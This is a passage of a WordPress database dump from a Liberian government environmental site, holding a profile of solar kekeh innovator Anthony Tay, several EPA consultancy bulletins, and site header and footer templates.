had provided a solution to a problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then Anthony started providing IT and school management support services at Dekwwoah International School of Excellence (D-WISE), a new junior and senior high school located at Police Academy Junction. It is the first of its kind international smart school that runs on a 90% IT platform. Two years before the school opened, Anthony tried to convince the owner to invest in solar power, but the owner was in doubt. When the school started in 2020, they had challenges with electricity. They were running a generator that was costly. It finally broke down and the Liberia Electricity Corporation (LEC) transformer in the area was also down. The owner finally agreed to use solar power and Anthony installed the system. Now, the school runs on a 5KVA solar system that has been working for three months. Since then, the school has had electricity 24/7. It is estimated that the school will be saving up to 4 million dollars in the next 5 years due to the solar. They would have been paying this amount on fuel, generator maintenance and LEC. Based on this, the owner plans to upgrade the solar system to 45 KVAs within the next year. He now understands that the initial capital to set up a solar system may be high, but the long term benefits are worth it. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"601\" height=\"278\" src=\"https://lh6.googleusercontent.com/tTHOJJHa0wkQy5E6tiMuG68A8R_i90fNM4LARxOksl2vnwMW8a98zAvr7etlX1heO9LAdY97dSQgBJCZxr3G9H-BQIXy4JsRSCLj4VB4eRVTkfHZzvy2vRS51tQymzfp6vcDcjA\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All the classes at D-WISE have ACs and smart boards, because it is a digital school. They don’t teach on blackboards or whiteboards. They teach on computer devices called smart boards, hence, the school cannot run without electricity. Their books are also stored and saved within the smart board. When there is no power, there are no classes. They also have a functional computer lab. That’s how important having constant electricity is to this facility. With solar energy, they were able to overcome that challenge.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to solving the electricity problem at the school, Anthony observed that Liberians are having challenges with transportation. He owned a motor vehicle and the cost of fuel was so high. He saw people having to sleep in the line at gas stations during fuel shortages. “I thought, what could we do to get vehicles running on solar instead of gasoline and diesel? God has blessed Liberia with a lot of sunlight. How can we convert that blessing into benefits? So, I started processing and designing ways to convert cars to solar,” Anthony said.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first test Anthony did was with an electric motorcycle that the Chinese government gave to the Liberia National Police. In 2016, the motorcycle developed problems and they wanted to throw it away, so Anthony took it and converted it to solar. He used it around town and it inspired him to do more. Then Anthony thought about how to help kekeh riders save some money by designing the solar kekeh. They would not use gas, oil or spark plugs. As long as there is day, the solar kekeh will have power.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fortunately, Anthony came across electric kekehs in Liberia brought in from China. But they were becoming trash because electricity is not constant in the country. The electric kekeh needs to be charged with electricity, so when there is no LEC or generator, the driver can’t run the electric kekeh. So Anthony took an electric kekeh that somebody was about to trash and he converted it to a solar kekeh. The first test was done during the rainy season. He observed that once there is day with sunlight, the kekeh will be charged, even in the rainy season. Then he started talking to the company in China that manufactures electric kekehs. Since then, he has received 15 electric kekehs and converted them to solar kekehs. Anthony calls them solar kekehs because they are solar. An electric kekeh is a kekeh that runs on electricity. All electricity sources are not clean. An e-kekeh would need a generator or solar power station to charge when there is no LEC. A solar kekeh is different because it charges on its own when solar energy hits the solar panels on the roof. With the solar kekeh, while you are moving or parked, you are generating energy. If you park the solar kekeh and go to work for a few hours, by the time you leave, it’s already fully charged. From the solar panel to the battery, power is being stored.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"294\" height=\"136\" src=\"https://lh4.googleusercontent.com/DFvtUBTkg1lAnXBdaUEcG8u8y2P7AN7_jrePkK4DVt042PFpJ4IbuYqqn46FlRfRwRVvigj9akzAqZujiKELVddLVCb6SNpwyff5qo-nIWqQK2sCs6fjxTNzyQmA-eTVy63DIiA\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"303\" height=\"140\" src=\"https://lh6.googleusercontent.com/Q5kin0J3QKMthfpFJ5_OH1FUMg6tYMcql3yzxNWB6wrS6PnTSdFrwpNNjSgMqEA5hacP5MuN_clMAGKaBpROt1AiZENj4Yusw1JslTrD7f24rBAPUD32xAeqKlnkCc4YNujFTmw\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"601\" height=\"278\" src=\"https://lh6.googleusercontent.com/b1m2y_dpT8u1keHZOA81AuYW45DF1sda5bl3t-7G6J9dyldmfoeQ9Jq6CjgWFRY_Ly6caTN1m52PWkukuFLY1P9hHR-xagrm2zJF4fjgU0S8KWaLt-5AIHkYAx2t1AdxhM-418E\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony’s solar kekeh sells for $3,500. Out of 15, 5 are currently in use. Anthony gets a lot of calls from people who want to take them on credit, but he can’t afford to take the risk. “If I could make a deal with a bank where my investment can be secured, I would give them out on credit,” he said. For now, Anthony Tay’s company has no international partners or investors. He has been using his own finances to develop these products.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When asked what he thought about Liberia’s Nationally Determined Contribution (NDC) target of importing 1,000 electric kekehs by 2025, Anthony said, “Solar energy is scientific. You cannot be testing a market and say you are going to bring a certain amount of e-kekehs or solar kekehs. That is not being realistic. I don’t doubt that the government can secure the importation of 1,000 kekehs in the next 5 years, but those e-kekehs or solar kekehs being put into use is another thing. Will they just be parked in the warehouse? Based on our pilot result, we will determine the level of importation and supply, because you do supply based on demand.” </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"238\" height=\"317\" src=\"https://lh3.googleusercontent.com/JbtMsnmWEtY0qJ7C0PKViUyson-Jd3NPsMPTN0o4oBHCKo9mCYeekwYoEI4A03PtpBezn9Kr5HAqXA2tIz2u6az-hx_FozqmrELIhofr7uMJiAo1UH38rWo3Fra5fpgFhN0MqQk\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony Tay is the first person in Liberia to successfully develop solar kekehs and the only for now. He has already tested a mini-solar car and solar pickup that will soon be in the traffic. He also plans to develop a solar cook stove, solar cold storage plant and solar bus for the school.&nbsp;<img src=\"https://lh3.googleusercontent.com/JbtMsnmWEtY0qJ7C0PKViUyson-Jd3NPsMPTN0o4oBHCKo9mCYeekwYoEI4A03PtpBezn9Kr5HAqXA2tIz2u6az-hx_FozqmrELIhofr7uMJiAo1UH38rWo3Fra5fpgFhN0MqQk\" width=\"238\" height=\"317\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;“Power is in everything we do. It is our heartbeat. I believe the best source of power to sustain life comes from the Creator. Renewable energy is natural energy. It wasn’t made by man. I believe it was made by God. The sun was made by God and it’s there 24/7. As long as day will always break, there will always be solar energy. I believe it’s the most sustainable source of energy we can depend on.” Anthony Tay.&nbsp;</p>\n<!-- /wp:paragraph -->','Liberia’s Grassroots Solar Energy Innovator','','publish','open','open','','liberias-grassroots-solar-energy-innovator','','','2021-07-20 21:28:42','2021-07-20 21:28:42','',0,'https://ekmsliberia.info/?p=3781',159,'post','',0),(3782,42,'2021-07-20 21:28:10','2021-07-20 21:28:10','','kehkeh','','inherit','open','closed','','kehkeh','','','2021-07-20 21:28:10','2021-07-20 21:28:10','',3781,'https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png',0,'attachment','image/png',0),(3783,42,'2021-07-20 21:28:39','2021-07-20 21:28:39','<!-- wp:paragraph -->\n<p>Across the world, innovators from different sectors have invented devices, vehicles and medication that have solved our problems, made our lives easier and even saved lives. To name a few, Alexander Graham Bell invented the telephone in Scotland and Thomas Edison invented the light bulb in the United States. Now, Anthony Tay, 39 years old, is following their footsteps as he finds innovative solutions to electricity challenges using solar power. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony Tay is a Liberian Information Technology (IT) professional who got involved in solar energy research and development through a slight twist of fate. In 2012, he was running an internet café on Duport Road in Paynesville near Monrovia. One day, a Kenyan businessman came looking for high speed internet to pay his employees online back in Kenya. The man was in Liberia attending a religious event and looking for innovative people to join a training program in Kenya. After chatting with Anthony, the man realized that he was using technology that was far more advanced than the other internet cafes he had visited. Anthony was using laptops when the other cafes were still using desktops. Anthony was also using boosters that enabled him to provide high speed internet. The man was able to pay his employees online in less than 15 minutes. After listening to Anthony’s brilliant ideas, the man invited him to Kenya to join the training program. While studying in Kenya, renewable energy stood out to Anthony as a solution to Liberia’s electricity challenges. From there, Anthony planned to register a company and deal in renewable energy products when he returned to Liberia. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"293\" height=\"293\" src=\"https://lh6.googleusercontent.com/Wfo-1igoHGwvgwOoO5boGmeIb9j_xhadKwBsOiUfviP65XvRidX-JRQjXe39L6NVcEV57u0cpS0bc49ParcCsSLvp21WXzTludo6oCntbVfmN4Fjwpx0yxP1mAF1_ZiWXtvgTQM\">  </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Upon his return, Anthony continued his studies in the area of solar, which led to his certification by the North American Board of Renewable Energy Practitioners. He later started a company called Africa Capital Turning Systems. Then he got a contract at the German Embassy where he did some computer networking. He used the money he earned to procure the first set of solar products for testing at his own facility.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony’s first test was a mini-home system at the house he was living in. Before he moved in, the house had burned down due to problems with a tiger generator. The owner of the house was traumatized and refused to connect any electricity in the house after the incident. The place was in darkness. At the time, solar technology was already his focus, so Anthony installed the system and his family had electricity all the time from solar energy without noise and without needing gas, while other people had generators. He had provided a solution to a problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then Anthony started providing IT and school management support services at Dekwwoah International School of Excellence (D-WISE), a new junior and senior high school located at Police Academy Junction. It is the first of its kind international smart school that runs on a 90% IT platform. Two years before the school opened, Anthony tried to convince the owner to invest in solar power, but the owner was in doubt. When the school started in 2020, they had challenges with electricity. They were running a generator that was costly. It finally broke down and the Liberia Electricity Corporation (LEC) transformer in the area was also down. The owner finally agreed to use solar power and Anthony installed the system. Now, the school runs on a 5KVA solar system that has been working for three months. Since then, the school has had electricity 24/7. It is estimated that the school will be saving up to 4 million dollars in the next 5 years due to the solar. They would have been paying this amount on fuel, generator maintenance and LEC. Based on this, the owner plans to upgrade the solar system to 45 KVAs within the next year. He now understands that the initial capital to set up a solar system may be high, but the long term benefits are worth it. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"601\" height=\"278\" src=\"https://lh6.googleusercontent.com/tTHOJJHa0wkQy5E6tiMuG68A8R_i90fNM4LARxOksl2vnwMW8a98zAvr7etlX1heO9LAdY97dSQgBJCZxr3G9H-BQIXy4JsRSCLj4VB4eRVTkfHZzvy2vRS51tQymzfp6vcDcjA\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>All the classes at D-WISE have ACs and smart boards, because it is a digital school. They don’t teach on blackboards or whiteboards. They teach on computer devices called smart boards, hence, the school cannot run without electricity. Their books are also stored and saved within the smart board. When there is no power, there are no classes. They also have a functional computer lab. That’s how important having constant electricity is to this facility. With solar energy, they were able to overcome that challenge.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In addition to solving the electricity problem at the school, Anthony observed that Liberians are having challenges with transportation. He owned a motor vehicle and the cost of fuel was so high. He saw people having to sleep in the line at gas stations during fuel shortages. “I thought, what could we do to get vehicles running on solar instead of gasoline and diesel? God has blessed Liberia with a lot of sunlight. How can we convert that blessing into benefits? So, I started processing and designing ways to convert cars to solar,” Anthony said.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first test Anthony did was with an electric motorcycle that the Chinese government gave to the Liberia National Police. In 2016, the motorcycle developed problems and they wanted to throw it away, so Anthony took it and converted it to solar. He used it around town and it inspired him to do more. Then Anthony thought about how to help kekeh riders save some money by designing the solar kekeh. They would not use gas, oil or spark plugs. As long as there is day, the solar kekeh will have power.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fortunately, Anthony came across electric kekehs in Liberia brought in from China. But they were becoming trash because electricity is not constant in the country. The electric kekeh needs to be charged with electricity, so when there is no LEC or generator, the driver can’t run the electric kekeh. So Anthony took an electric kekeh that somebody was about to trash and he converted it to a solar kekeh. The first test was done during the rainy season. He observed that once there is day with sunlight, the kekeh will be charged, even in the rainy season. Then he started talking to the company in China that manufactures electric kekehs. Since then, he has received 15 electric kekehs and converted them to solar kekehs. Anthony calls them solar kekehs because they are solar. An electric kekeh is a kekeh that runs on electricity. All electricity sources are not clean. An e-kekeh would need a generator or solar power station to charge when there is no LEC. A solar kekeh is different because it charges on its own when solar energy hits the solar panels on the roof. With the solar kekeh, while you are moving or parked, you are generating energy. If you park the solar kekeh and go to work for a few hours, by the time you leave, it’s already fully charged. From the solar panel to the battery, power is being stored.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"294\" height=\"136\" src=\"https://lh4.googleusercontent.com/DFvtUBTkg1lAnXBdaUEcG8u8y2P7AN7_jrePkK4DVt042PFpJ4IbuYqqn46FlRfRwRVvigj9akzAqZujiKELVddLVCb6SNpwyff5qo-nIWqQK2sCs6fjxTNzyQmA-eTVy63DIiA\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"303\" height=\"140\" src=\"https://lh6.googleusercontent.com/Q5kin0J3QKMthfpFJ5_OH1FUMg6tYMcql3yzxNWB6wrS6PnTSdFrwpNNjSgMqEA5hacP5MuN_clMAGKaBpROt1AiZENj4Yusw1JslTrD7f24rBAPUD32xAeqKlnkCc4YNujFTmw\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"601\" height=\"278\" src=\"https://lh6.googleusercontent.com/b1m2y_dpT8u1keHZOA81AuYW45DF1sda5bl3t-7G6J9dyldmfoeQ9Jq6CjgWFRY_Ly6caTN1m52PWkukuFLY1P9hHR-xagrm2zJF4fjgU0S8KWaLt-5AIHkYAx2t1AdxhM-418E\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony’s solar kekeh sells for $3,500. Out of 15, 5 are currently in use. Anthony gets a lot of calls from people who want to take them on credit, but he can’t afford to take the risk. “If I could make a deal with a bank where my investment can be secured, I would give them out on credit,” he said. For now, Anthony Tay’s company has no international partners or investors. He has been using his own finances to develop these products.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When asked what he thought about Liberia’s Nationally Determined Contribution (NDC) target of importing 1,000 electric kekehs by 2025, Anthony said, “Solar energy is scientific. You cannot be testing a market and say you are going to bring a certain amount of e-kekehs or solar kekehs. That is not being realistic. I don’t doubt that the government can secure the importation of 1,000 kekehs in the next 5 years, but those e-kekehs or solar kekehs being put into use is another thing. Will they just be parked in the warehouse? Based on our pilot result, we will determine the level of importation and supply, because you do supply based on demand.” </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img width=\"238\" height=\"317\" src=\"https://lh3.googleusercontent.com/JbtMsnmWEtY0qJ7C0PKViUyson-Jd3NPsMPTN0o4oBHCKo9mCYeekwYoEI4A03PtpBezn9Kr5HAqXA2tIz2u6az-hx_FozqmrELIhofr7uMJiAo1UH38rWo3Fra5fpgFhN0MqQk\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Anthony Tay is the first person in Liberia to successfully develop solar kekehs and the only for now. He has already tested a mini-solar car and solar pickup that will soon be in the traffic. He also plans to develop a solar cook stove, solar cold storage plant and solar bus for the school.&nbsp;<img src=\"https://lh3.googleusercontent.com/JbtMsnmWEtY0qJ7C0PKViUyson-Jd3NPsMPTN0o4oBHCKo9mCYeekwYoEI4A03PtpBezn9Kr5HAqXA2tIz2u6az-hx_FozqmrELIhofr7uMJiAo1UH38rWo3Fra5fpgFhN0MqQk\" width=\"238\" height=\"317\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;“Power is in everything we do. It is our heartbeat. I believe the best source of power to sustain life comes from the Creator. Renewable energy is natural energy. It wasn’t made by man. I believe it was made by God. The sun was made by God and it’s there 24/7. As long as day will always break, there will always be solar energy. I believe it’s the most sustainable source of energy we can depend on.” Anthony Tay.&nbsp;</p>\n<!-- /wp:paragraph -->','Liberia’s Grassroots Solar Energy Innovator','','inherit','closed','closed','','3781-revision-v1','','','2021-07-20 21:28:39','2021-07-20 21:28:39','',3781,'https://ekmsliberia.info/3781-revision-v1/',0,'revision','',0),(3787,42,'2021-07-30 15:01:19','2021-07-30 15:01:19','Liberia as a Party to the Rio Conventions, namely the Convention on Biological Diversity, the Convention on Combating Desertification, and the Framework Convention on Climate Change, is revising its National Capacity Self-Assessment Report to identify the capacity gaps on the implementation of the Conventions since its last assessment in 2006. The Consultant (s) shall support the CCCD Project to review the implementation status for each of the three Rio Conventions at the national level. The Consultant shall further analyze the capacity constraints on their implementation and propose potential opportunities to build the three levels of capacity development at the country level. Liberia has gone through numerous past capacity building projects in which similar issues were raised and plans developed. Therefore, for this NCSA assessment, all the previous information will be used as the baseline and consultations and workshops used to verify and update the information. Additionally, the assessment will report on the actions already taken and untaken to implement the Rio Conventions.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20THEMATIC%20ASSESSMENT%20NCSA.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">CCCD EOI for Drafting Thematic Assessment</a></em>\r\n\r\n&nbsp;','Request for Expression of Interest: Draft Thematic Assessments','','publish','closed','closed','','request-for-expression-of-interest-draft-thematic-assessments','','','2021-08-19 08:44:32','2021-08-19 08:44:32','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3787',110,'ekms_bulletin','',0),(3788,42,'2021-07-30 15:03:26','2021-07-30 15:03:26','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a Local Consultant, who will administer the daily affairs of the project and lead efforts in the project implementation. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations. This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes. To this end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20PROJET%20CHIEF%20TECHNICAL%20ADVISOR%20%282%29.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Chief Technical Advisor Wanted for CCCD Project</a></em>','Chief Technical Advisor Wanted For CCCD Project At EPA','','publish','closed','closed','','chief-technical-advisor-wanted-for-cccd-project-at-epa','','','2021-08-19 08:43:39','2021-08-19 08:43:39','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3788',109,'ekms_bulletin','',0),(3789,42,'2021-07-30 15:06:09','2021-07-30 15:06:09','This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively. The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations. This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes. To that end, the objective of this project is to strengthen a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.\r\n\r\nThe CCCD Project is implemented by the Environmental Protection Agency in collaboration with the UNDP with funding from the Global Environment Facility (GEF). The EPA is seeking the recruitment of 3 broadcasters to air jingles and public service announcement.\r\n\r\nLink: <em><a href=\"https://www.epa.gov.lr/sites/default/files/CCCD%20JINGLE%20AND%20PUBLIC%20SERVICE%20ANNOUNCEMENT.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">EOI for Airing of Jingles for CCCD Project</a></em>','Request for Expression of Interest For Airing of Jingles and Public Service Announcements','','publish','closed','closed','','request-for-expression-of-interest-for-airing-of-jingles-and-public-service-announcements','','','2021-08-19 08:42:20','2021-08-19 08:42:20','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3789',108,'ekms_bulletin','',0),(3790,42,'2021-07-30 15:09:39','2021-07-30 15:09:39','The consultancy aims to examine the awareness level among Liberians (public, institutions and organizations and rural settlers), to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts climate change, biological conservation and land degradation. A review of previous related surveys is also required amongst a survey of the public, institutions, individuals and other relevant groups. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-ASSESSMENT-PUBLIC-AWARENESS-OF-RIO-CONVENTIONS-IMPLEMENTATIONS.docx\" target=\"_blank\" rel=\"noopener\">Survey to Assess Public Awareness</a></em>','Request for Expression of Interest: A Survey to Assess Public Awareness of the Importance of the RIO Conventions','','publish','closed','closed','','request-for-expression-of-interest-a-survey-to-assess-public-awareness-of-the-importance-of-the-rio-conventions','','','2021-08-23 10:22:30','2021-08-23 10:22:30','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3790',107,'ekms_bulletin','',0),(3791,42,'2021-07-30 15:11:21','2021-07-30 15:11:21','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.\r\n\r\nLink: <em><a href=\"https://ekmsliberia.info/wp-content/uploads/2021/08/CCCD-INDIVIDUAL-ASSESSMENT.docx\" target=\"_blank\" rel=\"noopener\">Individual Interviews to Gather Additional Inputs</a></em>','Request for Expression of Interest: Individual Interviews to gather additional inputs on National Priorities and Constraints','','publish','closed','closed','','request-for-expression-of-interest-individual-interviews-to-gather-additional-inputs-on-national-priorities-and-constraints','','','2021-08-23 10:25:28','2021-08-23 10:25:28','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3791',106,'ekms_bulletin','',0),(3795,38,'2021-08-11 16:36:33','2021-08-11 16:36:33','','Institution Logo','','publish','closed','closed','','institution_logo','','','2021-08-11 16:36:33','2021-08-11 16:36:33','',714,'https://ekmsliberia.info/?post_type=_pods_field&p=3795',0,'_pods_field','',0),(3796,38,'2021-08-11 16:36:33','2021-08-11 16:36:33','','Internet','','publish','closed','closed','','internet','','','2021-08-11 16:36:33','2021-08-11 16:36:33','',714,'https://ekmsliberia.info/?post_type=_pods_field&p=3796',1,'_pods_field','',0),(3800,38,'2021-08-16 11:25:26','2021-08-16 11:25:26','<img width=\"759\" height=\"681\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo.jpg 759w, https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo-300x269.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2021/08/ekms_logo-600x538.jpg 600w\" sizes=\"(max-width: 759px) 100vw, 759px\" />														\n			<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"https://ekms-liberia.mn.co/?autojoin=1\" role=\"button\">\n						Signup, It\'s free!\n					</a>\n												<img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"\" loading=\"lazy\" />														\n		[gtranslate]','Site-header','','publish','closed','closed','','site-header','','','2021-09-09 12:37:13','2021-09-09 12:37:13','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=3800',0,'elementor_library','',0),(3803,38,'2021-08-16 11:36:19','2021-08-16 11:36:19','','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-16 11:36:19','2021-08-16 11:36:19','',3800,'https://ekmsliberia.info/?p=3803',0,'revision','',0),(3804,38,'2021-08-16 11:36:19','2021-08-16 11:36:19','<h2>Environmental Knowledge <br>Management System</h2>		\n		<p>Join us to help grow <br />the EKMS Community</p>		\n			<a href=\"#\" role=\"button\">\n						Signup, It\'s free!\n					</a>','Site-header','','inherit','closed','closed','','3800-revision-v1','','','2021-08-16 11:36:19','2021-08-16 11:36:19','',3800,'https://ekmsliberia.info/?p=3804',0,'revision','',0),(3805,38,'2021-08-16 11:46:45','2021-08-16 11:46:45','Subscribe To Our Newsletter		\n			<a href=\"https://ekmsliberia.info/newsletter/\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMSAre you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"https://ekmsliberia.info/contribute/\">Join here!</a>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n											<a href=\"mailto:contact@ekmsliberia.info\">\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>\n									</li>\n						</ul>\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img width=\"600\" height=\"600\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?w=600&amp;ssl=1 600w, https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png?resize=150%2C150&amp;ssl=1 150w\" sizes=\"(max-width: 600px) 100vw, 600px\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		This is an Official Web Platform of the Liberian Government.','Site-footer','','publish','closed','closed','','site-footer','','','2023-06-16 12:00:47','2023-06-16 12:00:47','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=3805',0,'elementor_library','',0),(3806,38,'2021-08-16 11:49:17','2021-08-16 11:49:17','','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:49:17','2021-08-16 11:49:17','',3805,'https://ekmsliberia.info/?p=3806',0,'revision','',0),(3807,38,'2021-08-16 11:49:17','2021-08-16 11:49:17','Subscribe To Our Newsletter		\n			<a href=\"#\" role=\"button\">\n						Sign up now\n					</a>\n		Contribute to the EKMS<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <a style=\"color: #ffffff; text-decoration: underline;\" href=\"#\">Join here!</a></p>This SiteContact		\n					<ul>\n							<li>\n										Address:<br>4th Street, Sinkor\n									</li>\n								<li>\n					<a href=\"mailto:contact@ekmsliberia.info\">						\n										Email:<br>contact@ekmsliberia.info\n											</a>\n									</li>\n								<li>\n										Telephone:<br>+231775006254\n									</li>\n						</ul>\n												<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/white_bg_seal.png\" title=\"\" alt=\"\" />														\n		This is an Official Web Platform of the Liberian Government.		\n													<a href=\"https://www.thegef.org\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.infoliberia.info/wp-content/uploads/2021/08/gef_logo.jpg\" title=\"\" alt=\"\" />								</a>\n		This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.Follow us		\n					<a href=\"https://www.facebook.com/ekms.lib.7\" target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a href=\"https://twitter.com/EkmsLiberia\" target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a href=\"https://www.instagram.com/ekmsliberia/\" target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>','Site-footer','','inherit','closed','closed','','3805-revision-v1','','','2021-08-16 11:49:17','2021-08-16 11:49:17','',3805,'https://ekmsliberia.info/?p=3807',0,'revision','',0),(3808,38,'2021-08-16 11:49:59','2021-08-16 11:49:59','Subscribe To Our Newsletter		\n			<a href=\"#\" role=\"button\">\n						